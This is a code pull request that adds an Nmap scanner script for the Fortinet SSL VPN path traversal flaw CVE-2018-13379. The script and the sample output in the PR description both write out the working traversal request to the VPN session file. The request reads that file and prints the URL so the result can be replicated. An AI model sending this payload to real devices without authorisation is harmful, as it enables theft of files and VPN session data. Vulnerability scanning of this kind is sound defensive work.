### PR TITLE
Fortinet SSL VPN  CVE-2018-13379 vuln scanner

### DIFF
--- a/scripts/CVE-2018-13379.nse
+++ b/scripts/CVE-2018-13379.nse
@@ -14,9 +14,10 @@ An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal"
 -- |   Host is vulnerable to CVE-2018-13379
 -- @changelog
 -- 2019-23-08 - created by Alejandro Flores Covarrubias <alejandro.florescova@gmail.com>
+-- Twitter: alejandrocovrr
 --
 
-author = "Alejandro Flores Covarrubias <alejandro.florescova@gmail.com>"
+author = "Alejandro Flores Covarrubias <alejandro.florescova@gmail.com> @alejandrocovrr"
 categories = {"discovery", "intrusive","vuln"}
 
 local http = require "http"

--- a/scripts/CVE-2018-13379.nse
+++ b/scripts/CVE-2018-13379.nse
@@ -1,0 +1,77 @@
+description = [[
+Performs a scan to check whether the scanned server is vulnerable to CVE-2018-13379
+
+CVE-2018-13379:
+An Improper Limitation of a Pathname to a Restricted Directory ("Path Traversal") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests.
+]]
+---
+-- @usage
+-- nmap --script CVE-2018-13379 -p <port> <host>
+-- @output
+-- PORT   STATE SERVICE
+-- 443/tcp open  http
+-- | CVE-2018-13379: 
+-- |   Host is vulnerable to CVE-2018-13379
+-- @changelog
+-- 2019-23-08 - created by Alejandro Flores Covarrubias <alejandro.florescova@gmail.com>
+--
+
+author = "Alejandro Flores Covarrubias <alejandro.florescova@gmail.com>"
+categories = {"discovery", "intrusive","vuln"}
+
+local http = require "http"
+local stdnse = require "stdnse"
+local shortport = require "shortport"
+
+portrule = shortport.ssl
+
+
+action = function(host,port)
+
+    local path
+    local response
+    local output = {}
+    local success = "Host is vulnerable to CVE-2018-13379 (Fortinet SSL VPN)"
+    local fail = "Host is not vulnerable"
+
+    path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
+
+    response = http.get(host, port.number, path)  
+
+    -- Request failed
+    if not response.status then
+        -- Bad response
+        stdnse.print_debug("REQUEST FAILED")
+        -- Exit
+        return
+    end
+
+    -- 200 response status - Success
+    if response.status == 200 then
+        stdnse.print_debug("%s: %s GET %s - 200 OK",
+                           SCRIPT_NAME,
+                           host.targetname or host.ip,
+                           path)
+	table.insert(output, success)
+	table.insert(output, (" "))
+    table.insert(output,("Path traversal: https://%s:%d%s"):format(host.targetname or host.ip,port.number, path))
+	table.insert(output, (" "))
+	table.insert(output, ("References:"))
+	table.insert(output,("	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379"))
+	table.insert(output,("	https://nvd.nist.gov/vuln/detail/CVE-2018-13379"))
+	table.insert(output,("	https://fortiguard.com/psirt/FG-IR-18-384"))
+	table.insert(output,("	https://www.securityfocus.com/bid/108693/"))
+				
+
+    -- 403 response status
+    elseif response.status == 403 then
+        stdnse.print_debug("%s: %s GET %s - %d", 
+                           SCRIPT_NAME,
+                           host.targetname or host.ip,
+                           path,
+                           response.status)
+        table.insert(output, fail)
+    end
+
+    return stdnse.format_output(true, output)
+end


### PR DESCRIPTION
I created this scanner CVE-2018-13379.nse to check if a Fortinet host is vulnerable or not to Path Traversal in versions FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4. It sends a http request to the specified port, host and a static url, if it responds with a 200 OK it means it's vulnerable, also it displays the complete vulnerable path to replicate it. 

Sample output:

`PORT     STATE SERVICE`
`8443/tcp open  https-alt`
`| CVE-2018-13379: `
`|   Host is vulnerable to CVE-2018-13379 (Fortinet SSL VPN)`
`|    `
`|   Path traversal: https://10.0.1.99:8443/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession`
`|    `
`|   References:`
`|   	https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379`
`|   	https://nvd.nist.gov/vuln/detail/CVE-2018-13379`
`|   	https://fortiguard.com/psirt/FG-IR-18-384`
`|_  	https://www.securityfocus.com/bid/108693/`